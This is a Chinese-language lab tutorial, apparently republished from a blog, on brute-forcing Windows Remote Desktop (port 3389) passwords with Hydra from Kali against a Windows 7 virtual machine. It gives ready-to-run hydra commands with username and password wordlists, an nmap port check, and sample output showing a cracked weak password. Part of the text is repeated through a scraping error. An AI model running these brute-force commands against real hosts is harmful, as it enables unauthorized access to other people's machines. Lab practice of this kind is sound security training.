windows远程桌面的密码爆破
概述:
RDP是Windows的远程桌面协议。所占用的端口默认为3389,这个是可以修改的。
要求:
我们要暴力破解3389号端口的前提是对方的3389号端口是开放的。
爆破工具:kali使用hydra(九头蛇)工具进行密码爆破。
hydra语法:
hydra IP地址 rdp -l 用户名 -P 密码字典 -V
rdp 即RDP协议
-l 小写的l 后面加单用户名,已知用户名
-L 大写的L后面加的是用户名字典,破解用户名
-p小写的p后面加的是单密码,已知密码
-P 打写的P后面加是指定密码字典,破解密码
-V 大V是用来显示爆破的详细过程
一、实验题目:
windows远程桌面爆破
二、实验内容:
使用Hydra
三、环境准备:
(1)kali虚拟机(工具和口令字典进行远程桌面爆破)
(2)Windows 7 虚拟机(可以被远程连接的Windows)
注意kali版本太低则无法破解3389端口,rdp需要kali相应的模块支撑。
四、实验步骤:
一、已知对方主机的远程登录用户名下爆破密码:
1. 测试kali与win7的连通性
2. 在KALI虚拟机上面使用命令nmap查看WIN10的3389端口是否打开。
-
在KALI虚拟机上下载好的弱密码的文本文件放到目录下
-
使用海德拉工具Hydra(九头蛇)工具进行爆破,字典的制作可以用工具也可以自己手动输入常见弱口令。
密码爆破命令为:
hydra IP地址 rdp -l 用户名 -P 密码字典 -V
-l 小写的l 后面加单用户名,已知用户名
-P 打写的P后面加是指定密码字典,破解密码
-V 大V是用来显示爆破的详细过程
执行成功结果:
22 host: 10.20.151.183 login: zc password: 123456
1 of 1 target successfully completed, 1 valid password found
账号为zc,密码为123456.
二、同时爆破账户名及密码:
-
创建用户账户本,密码本
-
命令:
hydra IP rdp -L 用户本 -P 密码本 -V
-L 大L是账号字典
-P 大P是指定密码字典
字典一般要把路径加上不过要是能在相对路径下补全出来就不用文章来源:https://www.toymoban.com/news/detail-401048.html
a IP rdp -L 用户本 -P 密码本 -V
-L 大L是账号字典
-P 大P是指定密码字典
字典一般要把路径加上不过要是能在相对路径下补全出来就不用
文章来源地址https://www.toymoban.com/news/detail-401048.html
到了这里,关于第六天 01-hydra工具windows远程桌面的密码爆破的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
